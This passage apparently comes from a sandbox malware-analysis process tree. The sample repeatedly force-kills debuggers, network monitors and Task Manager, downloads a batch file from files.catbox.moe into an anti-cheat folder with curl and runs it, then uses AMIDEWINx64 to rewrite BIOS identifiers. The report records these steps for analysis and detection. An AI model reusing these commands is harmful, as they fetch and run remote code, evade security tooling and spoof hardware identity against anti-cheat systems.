    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1360
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2488
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:1804
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:4160
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:3428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:4044
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:1984
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:4648
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:3076
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1204
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:4088
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:4900
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:2164
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:4720
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:1380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:1924
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:648
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:1628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:776
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:3832
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:3868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:2216
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:968
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4180
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:3112
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:3740
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3548
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3360
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    - Suspicious use of AdjustPrivilegeToken
    PID:4152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:3460
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:1996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:3712
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:2344
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Kills process with taskkill
    PID:336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:2936
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:2212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3392
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:3672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4348
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4784
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:4192
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Kills process with taskkill
    PID:2796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:976
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:4032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2716
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4160
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:3428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    - Kills process with taskkill
    PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:4044
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Kills process with taskkill
    PID:3536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:1984
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Kills process with taskkill
    PID:1572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:4648
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    PID:2420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:3076
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:1868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:2604
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Kills process with taskkill
    PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:4900
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl -o "C:\Program Files (x86)\EasyAntiCheat_EOS\gvi5ia.bat" https://files.catbox.moe/gvi5ia.bat
  2⤵
  PID:2164
- - C:\Windows\system32\curl.exe
    curl -o "C:\Program Files (x86)\EasyAntiCheat_EOS\gvi5ia.bat" https://files.catbox.moe/gvi5ia.bat
    3⤵
    - Drops file in Program Files directory
    PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:4720
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:3184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:4736
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    PID:1336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:1832
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Cerber
    PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:1200
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    PID:1136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:1224
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    PID:2824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:4380
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
  2⤵
  PID:4820
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
    3⤵
    - Cerber
    PID:2852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
  2⤵
  PID:4480
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MugenJinFuu-i386.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:3656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
  2⤵
  PID:4504
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-x86_64.exe
    3⤵
    - Cerber
    PID:564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd /c ""C:\Program Files (x86)\EasyAntiCheat_EOS\gvi5ia.bat
  2⤵
  PID:2684
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Program Files (x86)\EasyAntiCheat_EOS\gvi5ia.bat
    3⤵
    PID:4444
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
  2⤵
  PID:4080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im cheatengine-i386.exe
    3⤵
    - Kills process with taskkill
    PID:3548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
  2⤵
  PID:892
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
    3⤵
    PID:3360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:5104
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    - Cerber
    PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:3640
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    - Cerber
    PID:2780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
  2⤵
  PID:2840
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x64dbg.exe
    3⤵
    - Kills process with taskkill
    PID:576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
  2⤵
  PID:1332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im x32dbg.exe
    3⤵
    PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1112
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    PID:336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:3480
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    PID:2212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2396
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    PID:3672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:4164
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:5032
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:5020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:3252
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:1804
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    - Kills process with taskkill
    PID:2848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
  2⤵
  PID:5112
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Taskmgr.exe
    3⤵
    - Kills process with taskkill
    PID:972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:956
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:3180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3516
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:2096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2964
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:5004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
  2⤵
  PID:3404
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumperClient.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
  2⤵
  PID:1372
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im KsDumper.exe
    3⤵
    PID:1720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4648
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Cerber
    PID:2908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3076
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
  2⤵
  PID:2604
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ProcessHacker.exe
    3⤵
    PID:3328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"
  2⤵
  PID:2088
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /IVN "AMI"
    3⤵
    - Executes dropped EXE
    PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
  2⤵
  PID:4808
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq.exe
    3⤵
    - Cerber
    PID:4568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
  2⤵
  PID:1712
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im idaq64.exe
    3⤵
    - Cerber
    PID:1628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
  2⤵
  PID:4868
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
    3⤵
    - Executes dropped EXE
    PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
  2⤵
  PID:2020
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Wireshark.exe
    3⤵
    - Cerber
    PID:428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
  2⤵
  PID:1008
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SP "System product name"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
  2⤵
  PID:2996
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Fiddler.exe
    3⤵
    PID:652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SV "System version"
  2⤵
  PID:4180
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SV "System version"
    3⤵
    - Executes dropped EXE
    PID:3656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
  2⤵
  PID:568
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FiddlerEverywhere.exe
    3⤵
    - Kills process with taskkill
    PID:2596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
  2⤵
  PID:840
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos64.exe
    3⤵
    PID:2700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SS QCWJWGUYOK
  2⤵
  PID:2352
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SS QCWJWGUYOK
    3⤵
    - Executes dropped EXE
    PID:3112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
  2⤵
  PID:2556
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos.exe
    3⤵
    - Cerber
    PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SU AUTO
  2⤵
  PID:1076
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SU AUTO
    3⤵
    - Executes dropped EXE
    PID:2248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
  2⤵
  PID:5100
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Xenos32.exe
    3⤵
    - Cerber
    - Kills process with taskkill
    PID:724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
  2⤵
  PID:3792
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
    3⤵
    - Executes dropped EXE
    PID:2028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
  2⤵
  PID:1016
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im de4dot.exe
    3⤵
    - Cerber
    PID:3640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
  2⤵
  PID:380
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /SK "To Be Filled By O.E.M"
    3⤵
    - Executes dropped EXE
    PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
  2⤵
  PID:4852
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Cheat Engine.exe
    3⤵
    - Kills process with taskkill
    PID:3440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"
  2⤵
  PID:4512
- - C:\Windows\System32\AMIDEWINx64.EXE
    C:\Windows\System32\AMIDEWINx64.EXE /BM "ASRock"
    3⤵
    - Cerber
    - Executes dropped EXE
    PID:1384
- C:\Windows\system32\cmd.exe
